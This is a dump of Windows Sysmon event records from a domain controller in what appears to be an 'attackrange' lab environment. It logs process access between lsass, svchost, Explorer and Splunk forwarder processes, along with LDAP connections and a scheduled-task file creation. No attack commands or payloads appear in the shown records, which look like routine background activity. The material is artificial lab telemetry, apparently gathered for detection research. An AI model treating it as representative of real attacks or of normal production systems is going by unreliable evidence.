12:02:13.957{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004640Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.942{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004639Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.942{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004638Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.786{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x80000000000000004637Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.493{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-892.attackrange.local53576-false10.0.1.14win-dc-892.attackrange.local389ldap 354300x80000000000000004636Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.493{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53576-false10.0.1.14win-dc-892.attackrange.local389ldap 354300x80000000000000004635Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.485{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53575-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 354300x80000000000000004634Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.485{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53575-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 10341000x80000000000000004633Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.646{266CAFBE-64C5-6064-A600-00000000AE01}45443212C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004632Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.506{266CAFBE-646C-6064-1000-00000000AE01}11242272C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004631Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.506{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004630Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.490{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-64C5-6064-A600-00000000AE01}4544C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004629Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.490{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004628Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.490{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004627Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.490{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004626Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.490{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004625Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.490{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-64C5-6064-A600-00000000AE01}4544C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000004624Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.490{266CAFBE-647D-6064-2F00-00000000AE01}27964104C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-64C5-6064-A600-00000000AE01}4544C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000004623Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.492{266CAFBE-64C5-6064-A600-00000000AE01}4544C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004622Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.475{266CAFBE-64C1-6064-9100-00000000AE01}51083828C:\Windows\system32\csrss.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000004621Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.475{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004620Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.475{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004619Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.475{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004618Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.475{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004617Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.475{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000004616Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.475{266CAFBE-646C-6064-1000-00000000AE01}11242272C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\UBPM.dll+acf0|c:\windows\system32\UBPM.dll+fa34|c:\windows\system32\UBPM.dll+cdcc|c:\windows\system32\UBPM.dll+d395|c:\windows\system32\UBPM.dll+dc95|c:\windows\system32\UBPM.dll+e9dd|c:\windows\system32\UBPM.dll+e1ba|c:\windows\system32\UBPM.dll+de12|c:\windows\system32\EventAggregation.dll+3e22|c:\windows\system32\EventAggregation.dll+389a|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65bf5|C:\Windows\SYSTEM32\ntdll.dll+658fd|C:\Windows\SYSTEM32\ntdll.dll+65760|C:\Windows\SYSTEM32\ntdll.dll+3a890|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004615Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.475{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 11241100x80000000000000004614Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localT10532021-03-31 12:02:13.475{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exeC:\Windows\System32\Tasks\CreateExplorerShellUnelevatedTask2021-03-31 12:02:13.475 23542300x80000000000000004613Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.459{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=74BD5E678AE8C7C719C3D8A60BBEDBAD,SHA256=599B8C42CE11C4A4D98BDB81E921949CC76F3B7C9106442EF2694F5C3606C31B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000004612Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.459{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-64C4-6064-A400-00000000AE01}4212C:\Windows\Explorer.EXE0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004611Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.459{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-64C4-6064-A400-00000000AE01}4212C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x80000000000000004610Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.459{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53574-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49666- 354300x80000000000000004609Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.459{266CAFBE-64C3-6064-9800-00000000AE01}4824C:\Windows\System32\efsui.exeATTACKRANGE\Administratortcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53574-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49666- 